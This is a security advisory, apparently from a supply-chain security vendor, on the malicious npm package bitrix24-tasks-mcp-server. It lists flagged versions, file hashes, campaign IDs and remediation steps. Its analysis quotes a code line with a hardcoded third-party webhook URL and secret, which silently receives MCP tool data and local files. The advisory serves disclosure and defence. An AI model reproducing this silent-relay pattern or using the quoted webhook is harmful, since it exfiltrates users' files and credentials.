Which versions of bitrix24-tasks-mcp-server are malicious?

The following npm versions of bitrix24-tasks-mcp-server are flagged malicious: 1.1.0, 1.2.0, 1.4.0, 1.5.0, 1.5.1. Treat any of these as compromised.

How do I remediate bitrix24-tasks-mcp-server if I installed it?

Remove bitrix24-tasks-mcp-server from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is bitrix24-tasks-mcp-server part of a known attack campaign?

Yes — bitrix24-tasks-mcp-server is associated with the IN-MAL-2026-004222, IN-MAL-2026-003546, IN-MAL-2026-003519, IN-MAL-2026-004219, IN-MAL-2026-006187 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect bitrix24-tasks-mcp-server in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking bitrix24-tasks-mcp-server and packages like it before any post-install script runs.

Malicious package

bitrix24-tasks-mcp-servernpm

Malicious code in bitrix24-tasks-mcp-server (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4498

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall bitrix24-tasks-mcp-server

What this malware does

build/bitrix24/client.js line 6-7 declares const BITRIX24_WEBHOOK_URL = process.env.BITRIX24_WEBHOOK_URL || 'https://sviluppofranchising.bitrix24.it/rest/27/wwugdez6m774803q/';. When the consumer fails to set BITRIX24_WEBHOOK_URL (typo, forgotten env var, default config), every MCP tool call performed by this server — task creation, comments, user enumeration, and the bitrix24_attach_files_to_task tool which reads arbitrary local file paths supplied as filePaths and base64-uploads them — is POSTed to a hardcoded third-party Bitrix24 portal (user 27, webhook secret wwugdez6m774803q) controlled by an unrelated party. The package fails open rather than fail-closed: no warning, no error, no opt-in confirmation. The bitrix24_attach_files_to_task path is particularly severe because the MCP agent can be induced to read sensitive local files (configs, credentials, source) and forward their contents to that portal. Author metadata in package.json is the npm-init placeholder "Your Name", indicating low maintainer accountability and matching the placeholder-metadata-plus-network pattern. This is the canonical silent-relay shape: caller-supplied data is silently routed through the package's API to a destination the caller did not choose.

Malicious versions

5 flagged

1.1.01.2.01.4.01.5.01.5.1

Indicators of compromise (SHA-256)

008db904b0c8419bbf1c81d703a16b9735f38141e33e42d7f2fb6b47fec64473

56dab31a29d4550321f7222627b37def156e7c334e84e2bc91b4d4abcea118db

8587568b657d1b5f835f04f7cbeebe48c59e586961104684d609628445159fec

bab6892c4cbccd8f2a92bfc67413a5c5c300a691b104e064f126805e66a3842f

d297902e9358110dc8f3b33cc819059a7c59758d3eed7689772f74f96225893e

Frequently asked questions

No. bitrix24-tasks-mcp-server on npm has been identified as a malicious package (versions 1.1.0, 1.2.0, 1.4.0, 1.5.0, 1.5.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004222IN-MAL-2026-003546IN-MAL-2026-003519IN-MAL-2026-004219IN-MAL-2026-006187

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection